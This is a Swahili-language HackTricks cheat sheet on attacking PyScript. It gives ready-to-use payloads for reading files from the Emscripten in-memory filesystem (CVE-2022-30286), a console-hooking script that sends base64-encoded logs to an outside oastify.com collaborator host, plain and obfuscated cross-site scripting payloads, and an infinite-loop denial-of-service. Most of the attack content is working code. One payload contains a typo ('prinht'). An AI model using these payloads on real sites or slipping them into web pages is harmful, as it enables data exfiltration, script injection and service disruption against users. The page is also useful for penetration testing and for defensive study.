Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

Pyscript

Jifunze na zoezi la AWS Hacking:Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya AWS (ARTE) Jifunze na zoezi la GCP Hacking: Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya GCP (GRTE)

Support HackTricks

Mwongozo wa Kupenyeza kwa PyScript

PyScript ni mfumo mpya ulioendelezwa kwa kuingiza Python ndani ya HTML ili iweze kutumika pamoja na HTML. Katika karatasi hii ya udanganyifu, utapata jinsi ya kutumia PyScript kwa madhumuni yako ya kupenyeza.

Kudondosha / Kupata faili kutoka kwenye mfumo wa faili wa kumbukumbu ya Emscripten:

CVE ID: CVE-2022-30286 Msimbo:

<py-script>
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
out = fin.read()
print(out)
</py-script>

Matokeo:

Udhalilishaji wa Data wa OOB wa mfumo wa faili wa kumbukumbu ya kielelezo cha Emscripten (uchunguzi wa konsoli)

CVE ID: CVE-2022-30286 Msimbo:

<py-script>
x = "CyberGuy"
if x == "CyberGuy":
with open('/lib/python3.10/asyncio/tasks.py') as output:
contents = output.read()
print(contents)
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){     console.logs.push(Array.from(arguments));     console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
</py-script>

Matokeo:

Udukuzi wa Msituni wa Tovuti (Wa Kawaida)

Msimbo:

<py-script>
print("<img src=x onerror='alert(document.domain)'>")
</py-script>

Matokeo:

Uvamizi wa Tovuti wa Msalaba (Python iliyofichwa)

Msimbo:

<py-script>
sur = "\u0027al";fur = "e";rt = "rt"
p = "\x22x$$\x22\x29\u0027\x3E"
s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"
e = "c\u003d";q = "x"
y = "o";m = "ner";z = "ror\u003d"

print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
</py-script>

Matokeo:

Uvamizi wa Kuvuka Tovuti (Ufichaji wa JavaScript)

<py-script>
prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
</py-script>

Matokeo:

Shambulizi la DoS (Mzunguko wa Milele)

Msimbo:

<py-script>
while True:
print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;")
</py-script>

Matokeo:

Jifunze na zoezi la Kuvamia AWS:Mafunzo ya HackTricks Kwa Wataalamu wa Timu Nyekundu ya AWS (ARTE) Jifunze na zoezi la Kuvamia GCP: Mafunzo ya HackTricks Kwa Wataalamu wa Timu Nyekundu ya GCP (GRTE)

Support HackTricks
PreviousPython Internal Read GadgetsNextvenv

Last updated